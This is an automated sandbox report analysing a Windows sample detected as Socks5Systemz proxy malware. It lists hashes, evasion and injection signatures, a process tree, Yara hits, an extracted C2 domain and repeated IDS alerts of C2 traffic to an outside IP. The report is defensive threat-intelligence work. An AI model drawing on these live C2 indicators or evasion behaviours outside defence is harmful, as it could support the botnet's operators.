Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
j9htknb7BQ.exe

Overview

General Information

Sample name:j9htknb7BQ.exe
renamed because original name is a hash value
Original sample name:168a4450eaf205fa20bcc2d0881c830f.exe
Analysis ID:1575008
MD5:168a4450eaf205fa20bcc2d0881c830f
SHA1:32e77548315c9d48409057ea43e59ec4be060587
SHA256:77b07095ae775cc151b3c35088384ba9dcc722b2b5fcee7fa5a933141db67b26
Tags:exeSocks5Systemzuser-abuse_ch
Infos:

Detection

Petite Virus, Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Petite Virus
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
PE file has nameless sections
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • j9htknb7BQ.exe (PID: 2796 cmdline: "C:\Users\user\Desktop\j9htknb7BQ.exe" MD5: 168A4450EAF205FA20BCC2D0881C830F)
    • j9htknb7BQ.tmp (PID: 6536 cmdline: "C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp" /SL5="$20464,6991381,54272,C:\Users\user\Desktop\j9htknb7BQ.exe" MD5: F448D7F4B76E5C9C3A4EAFF16A8B9B73)
      • schtasks.exe (PID: 4564 cmdline: "C:\Windows\system32\schtasks.exe" /Query MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crtgame.exe (PID: 6556 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -i MD5: BB0124F16D88C4EC1FCFD9E524A5B921)
      • net.exe (PID: 5680 cmdline: "C:\Windows\system32\net.exe" helpmsg 10 MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 6784 cmdline: C:\Windows\system32\net1 helpmsg 10 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • crtgame.exe (PID: 5460 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -s MD5: BB0124F16D88C4EC1FCFD9E524A5B921)
  • cleanup
{"C2 list": ["bhdmpwg.com"]}
SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\CRTGame\bin\x86\is-VNLOG.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
    C:\Program Files (x86)\CRTGame\bin\x86\is-QRNOQ.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
      C:\Program Files (x86)\CRTGame\bin\x86\is-M6FGJ.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
        C:\Program Files (x86)\CRTGame\bin\x86\is-PA44V.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
          C:\Program Files (x86)\CRTGame\bin\x86\is-OMTUV.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
              00000007.00000002.3304521371.0000000002AFD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                Process Memory Space: crtgame.exe PID: 5460JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T03:02:55.599843+010020494671A Network Trojan was detected192.168.2.54978894.232.249.18780TCP
                  2024-12-14T03:02:56.223519+010020494671A Network Trojan was detected192.168.2.54978894.232.249.18780TCP
                  2024-12-14T03:03:00.188392+010020494671A Network Trojan was detected192.168.2.54978894.232.249.18780TCP
                  2024-12-14T03:03:01.776783+010020494671A Network Trojan was detected192.168.2.54980594.232.249.18780TCP
                  2024-12-14T03:03:03.473267+010020494671A Network Trojan was detected192.168.2.54980894.232.249.18780TCP
                  2024-12-14T03:03:04.078091+010020494671A Network Trojan was detected192.168.2.54980894.232.249.18780TCP
                  2024-12-14T03:03:05.665156+010020494671A Network Trojan was detected192.168.2.54981494.232.249.18780TCP
                  2024-12-14T03:03:06.269431+010020494671A Network Trojan was detected192.168.2.54981494.232.249.18780TCP
                  2024-12-14T03:03:06.873516+010020494671A Network Trojan was detected192.168.2.54981494.232.249.18780TCP
                  2024-12-14T03:03:08.485516+010020494671A Network Trojan was detected192.168.2.54982394.232.249.18780TCP
                  2024-12-14T03:03:10.101196+010020494671A Network Trojan was detected192.168.2.54982594.232.249.18780TCP
                  2024-12-14T03:03:10.708376+010020494671A Network Trojan was detected192.168.2.54982594.232.249.18780TCP
                  2024-12-14T03:03:11.317374+010020494671A Network Trojan was detected192.168.2.54982594.232.249.18780TCP
                  2024-12-14T03:03:11.921947+010020494671A Network Trojan was detected192.168.2.54982594.232.249.18780TCP
                  2024-12-14T03:03:13.508042+010020494671A Network Trojan was detected192.168.2.54983594.232.249.18780TCP
                  2024-12-14T03:03:14.105556+010020494671A Network Trojan was detected192.168.2.54983594.232.249.18780TCP
                  2024-12-14T03:03:15.692050+010020494671A Network Trojan was detected192.168.2.54984194.232.249.18780TCP
                  2024-12-14T03:03:16.306760+010020494671A Network Trojan was detected192.168.2.54984194.232.249.18780TCP
                  2024-12-14T03:03:17.892807+010020494671A Network Trojan was detected192.168.2.54984794.232.249.18780TCP
                  2024-12-14T03:03:19.468085+010020494671A Network Trojan was detected192.168.2.54985294.232.249.18780TCP
                  2024-12-14T03:03:21.044771+010020494671A Network Trojan was detected192.168.2.54985694.232.249.18780TCP
                  2024-12-14T03:03:22.655205+010020494671A Network Trojan was detected192.168.2.54986194.232.249.18780TCP
                  2024-12-14T03:03:24.257003+010020494671A Network Trojan was detected192.168.2.54986694.232.249.18780TCP
                  2024-12-14T03:03:24.859341+010020494671A Network Trojan was detected192.168.2.54986694.232.249.18780TCP
                  2024-12-14T03:03:26.438505+010020494671A Network Trojan was detected192.168.2.54987294.232.249.18780TCP
                  2024-12-14T03:03:28.022435+010020494671A Network Trojan was detected192.168.2.54987694.232.249.18780TCP
                  2024-12-14T03:03:29.809117+010020494671A Network Trojan was detected192.168.2.54988294.232.249.18780TCP
                  2024-12-14T03:03:31.399703+010020494671A Network Trojan was detected192.168.2.54988694.232.249.18780TCP
                  2024-12-14T03:03:32.982324+010020494671A Network Trojan was detected192.168.2.54989094.232.249.18780TCP
                  2024-12-14T03:03:34.569218+010020494671A Network Trojan was detected192.168.2.54989594.232.249.18780TCP
                  2024-12-14T03:03:35.171676+010020494671A Network Trojan was detected192.168.2.54989594.232.249.18780TCP
                  2024-12-14T03:03:36.746836+010020494671A Network Trojan was detected192.168.2.54990194.232.249.18780TCP
                  2024-12-14T03:03:38.392496+010020494671A Network Trojan was detected192.168.2.54990594.232.249.18780TCP
                  2024-12-14T03:03:39.995708+010020494671A Network Trojan was detected192.168.2.54991194.232.249.18780TCP
                  2024-12-14T03:03:41.677607+010020494671A Network Trojan was detected192.168.2.54991594.232.249.18780TCP
                  2024-12-14T03:03:42.283100+010020494671A Network Trojan was detected192.168.2.54991594.232.249.18780TCP
                  2024-12-14T03:03:43.859511+010020494671A Network Trojan was detected192.168.2.54992194.232.249.18780TCP
                  2024-12-14T03:03:45.435952+010020494671A Network Trojan was detected192.168.2.54992694.232.249.18780TCP
                  2024-12-14T03:03:47.021807+010020494671A Network Trojan was detected192.168.2.54993094.232.249.18780TCP
                  2024-12-14T03:03:47.629535+010020494671A Network Trojan was detected192.168.2.54993094.232.249.18780TCP
                  2024-12-14T03:03:49.207978+010020494671A Network Trojan was detected192.168.2.54993694.232.249.18780TCP
                  2024-12-14T03:03:49.821174+010020494671A Network Trojan was detected192.168.2.54993694.232.249.18780TCP
                  2024-12-14T03:03:50.426317+010020494671A Network Trojan was detected192.168.2.54993694.232.249.18780TCP
                  2024-12-14T03:03:52.004211+010020494671A Network Trojan was detected192.168.2.54994494.232.249.18780TCP
                  2024-12-14T03:03:52.613533+010020494671A Network Trojan was detected192.168.2.54994494.232.249.18780TCP
                  2024-12-14T03:03:53.219153+010020494671A Network Trojan was detected192.168.2.54994494.232.249.18780TCP
                  2024-12-14T03:03:54.800880+010020494671A Network Trojan was detected192.168.2.54995194.232.249.18780TCP
                  2024-12-14T03:03:55.413208+010020494671A Network Trojan was detected192.168.2.54995194.232.249.18780TCP
                  2024-12-14T03:03:57.005945+010020494671A Network Trojan was detected192.168.2.54995794.232.249.18780TCP
                  2024-12-14T03:03:58.578328+010020494671A Network Trojan was detected192.168.2.54996294.232.249.18780TCP
                  2024-12-14T03:04:00.163081+010020494671A Network Trojan was detected192.168.2.54996694.232.249.18780TCP
                  2024-12-14T03:04:01.756260+010020494671A Network Trojan was detected192.168.2.54997294.232.249.18780TCP
                  2024-12-14T03:04:03.336492+010020494671A Network Trojan was detected192.168.2.54997694.232.249.18780TCP
                  2024-12-14T03:04:05.046644+010020494671A Network Trojan was detected192.168.2.54998294.232.249.18780TCP
                  2024-12-14T03:04:06.631012+010020494671A Network Trojan was detected192.168.2.54998694.232.249.18780TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T03:02:55.599843+010020494681A Network Trojan was detected192.168.2.54978894.232.249.18780TCP
                  2024-12-14T03:02:56.223519+010020494681A Network Trojan was detected192.168.2.54978894.232.249.18780TCP
                  2024-12-14T03:03:00.188392+010020494681A Network Trojan was detected192.168.2.54978894.232.249.18780TCP
                  2024-12-14T03:03:01.776783+010020494681A Network Trojan was detected192.168.2.54980594.232.249.18780TCP
                  2024-12-14T03:03:03.473267+010020494681A Network Trojan was detected192.168.2.54980894.232.249.18780TCP
                  2024-12-14T03:03:04.078091+010020494681A Network Trojan was detected192.168.2.54980894.232.249.18780TCP
                  2024-12-14T03:03:05.665156+010020494681A Network Trojan was detected192.168.2.54981494.232.249.18780TCP
                  2024-12-14T03:03:06.269431+010020494681A Network Trojan was detected192.168.2.54981494.232.249.18780TCP
                  2024-12-14T03:03:06.873516+010020494681A Network Trojan was detected192.168.2.54981494.232.249.18780TCP
                  2024-12-14T03:03:08.485516+010020494681A Network Trojan was detected192.168.2.54982394.232.249.18780TCP
                  2024-12-14T03:03:10.101196+010020494681A Network Trojan was detected192.168.2.54982594.232.249.18780TCP
                  2024-12-14T03:03:10.708376+010020494681A Network Trojan was detected192.168.2.54982594.232.249.18780TCP
                  2024-12-14T03:03:11.317374+010020494681A Network Trojan was detected192.168.2.54982594.232.249.18780TCP
                  2024-12-14T03:03:11.921947+010020494681A Network Trojan was detected192.168.2.54982594.232.249.18780TCP
                  2024-12-14T03:03:13.508042+010020494681A Network Trojan was detected192.168.2.54983594.232.249.18780TCP
                  2024-12-14T03:03:14.105556+010020494681A Network Trojan was detected192.168.2.54983594.232.249.18780TCP
                  2024-12-14T03:03:15.692050+010020494681A Network Trojan was detected192.168.2.54984194.232.249.18780TCP
                  2024-12-14T03:03:16.306760+010020494681A Network Trojan was detected192.168.2.54984194.232.249.18780TCP
                  2024-12-14T03:03:17.892807+010020494681A Network Trojan was detected192.168.2.54984794.232.249.18780TCP
                  2024-12-14T03:03:19.468085+010020494681A Network Trojan was detected192.168.2.54985294.232.249.18780TCP
                  2024-12-14T03:03:21.044771+010020494681A Network Trojan was detected192.168.2.54985694.232.249.18780TCP
                  2024-12-14T03:03:22.655205+010020494681A Network Trojan was detected192.168.2.54986194.232.249.18780TCP
                  2024-12-14T03:03:24.257003+010020494681A Network Trojan was detected192.168.2.54986694.232.249.18780TCP
                  2024-12-14T03:03:24.859341+010020494681A Network Trojan was detected192.168.2.54986694.232.249.18780TCP
                  2024-12-14T03:03:26.438505+010020494681A Network Trojan was detected192.168.2.54987294.232.249.18780TCP
                  2024-12-14T03:03:28.022435+010020494681A Network Trojan was detected192.168.2.54987694.232.249.18780TCP
                  2024-12-14T03:03:29.809117+010020494681A Network Trojan was detected192.168.2.54988294.232.249.18780TCP
                  2024-12-14T03:03:31.399703+010020494681A Network Trojan was detected192.168.2.54988694.232.249.18780TCP
                  2024-12-14T03:03:32.982324+010020494681A Network Trojan was detected192.168.2.54989094.232.249.18780TCP
                  2024-12-14T03:03:34.569218+010020494681A Network Trojan was detected192.168.2.54989594.232.249.18780TCP
                  2024-12-14T03:03:35.171676+010020494681A Network Trojan was detected192.168.2.54989594.232.249.18780TCP
                  2024-12-14T03:03:36.746836+010020494681A Network Trojan was detected192.168.2.54990194.232.249.18780TCP
                  2024-12-14T03:03:38.392496+010020494681A Network Trojan was detected192.168.2.54990594.232.249.18780TCP
                  2024-12-14T03:03:39.995708+010020494681A Network Trojan was detected192.168.2.54991194.232.249.18780TCP
                  2024-12-14T03:03:41.677607+010020494681A Network Trojan was detected192.168.2.54991594.232.249.18780TCP
                  2024-12-14T03:03:42.283100+010020494681A Network Trojan was detected192.168.2.54991594.232.249.18780TCP
                  2024-12-14T03:03:43.859511+010020494681A Network Trojan was detected192.168.2.54992194.232.249.18780TCP
                  2024-12-14T03:03:45.435952+010020494681A Network Trojan was detected192.168.2.54992694.232.249.18780TCP
                  2024-12-14T03:03:47.021807+010020494681A Network Trojan was detected192.168.2.54993094.232.249.18780TCP
                  2024-12-14T03:03:47.629535+010020494681A Network Trojan was detected192.168.2.54993094.232.249.18780TCP
                  2024-12-14T03:03:49.207978+010020494681A Network Trojan was detected192.168.2.54993694.232.249.18780TCP
                  2024-12-14T03:03:49.821174+010020494681A Network Trojan was detected192.168.2.54993694.232.249.18780TCP
                  2024-12-14T03:03:50.426317+010020494681A Network Trojan was detected192.168.2.54993694.232.249.18780TCP
                  2024-12-14T03:03:52.004211+010020494681A Network Trojan was detected192.168.2.54994494.232.249.18780TCP
                  2024-12-14T03:03:52.613533+010020494681A Network Trojan was detected192.168.2.54994494.232.249.18780TCP
                  2024-12-14T03:03:53.219153+010020494681A Network Trojan was detected192.168.2.54994494.232.249.18780TCP
                  2024-12-14T03:03:54.800880+010020494681A Network Trojan was detected192.168.2.54995194.232.249.18780TCP
                  2024-12-14T03:03:55.413208+010020494681A Network Trojan was detected192.168.2.54995194.232.249.18780TCP
                  2024-12-14T03:03:57.005945+010020494681A Network Trojan was detected192.168.2.54995794.232.249.18780TCP
                  2024-12-14T03:03:58.578328+010020494681A Network Trojan was detected192.168.2.54996294.232.249.18780TCP
                  2024-12-14T03:04:00.163081+010020494681A Network Trojan was detected192.168.2.54996694.232.249.18780TCP
                  2024-12-14T03:04:01.756260+010020494681A Network Trojan was detected192.168.2.54997294.232.249.18780TCP
                  2024-12-14T03:04:03.336492+010020494681A Network Trojan was detected192.168.2.54997694.232.249.18780TCP
                  2024-12-14T03:04:05.046644+010020494681A Network Trojan was detected192.168.2.54998294.232.249.18780TCP
                  2024-12-14T03:04:06.631012+010020494681A Network Trojan was detected192.168.2.54998694.232.249.18780TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: j9htknb7BQ.exeAvira: detected
                  Source: crtgame.exe.5460.7.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["bhdmpwg.com"]}
                  Source: j9htknb7BQ.exeReversingLabs: Detection: 39%
                  Source: j9htknb7BQ.exeVirustotal: Detection: 58%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0045C8A8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045C8A8
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0045C95C ArcFourCrypt,1_2_0045C95C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0045C974 ArcFourCrypt,1_2_0045C974
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                  Compliance

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeUnpacked PE file: 5.2.crtgame.exe.400000.0.unpack
                  Source: j9htknb7BQ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-U01MD.tmp.1.dr
                  Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-MGR1O.tmp.1.dr
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004520C0 FindFirstFileA,GetLastError,1_2_004520C0
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,1_2_00473F08
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00496568
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463404
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463880
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,1_2_00461E78

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49841 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49841 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49835 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49835 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49814 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49825 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49825 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49814 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49805 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49805 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49788 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49861 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49788 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49861 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49876 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49876 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49866 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49866 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49872 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49872 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49823 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49886 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49886 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49823 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49847 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49852 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49852 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49847 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49882 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49890 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49890 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49882 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49911 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49911 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49905 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49905 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49921 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49921 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49915 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49915 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49901 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49901 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49936 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49936 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49926 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49926 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49930 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49856 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49930 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49856 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49895 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49808 -> 94.232.249.187:80
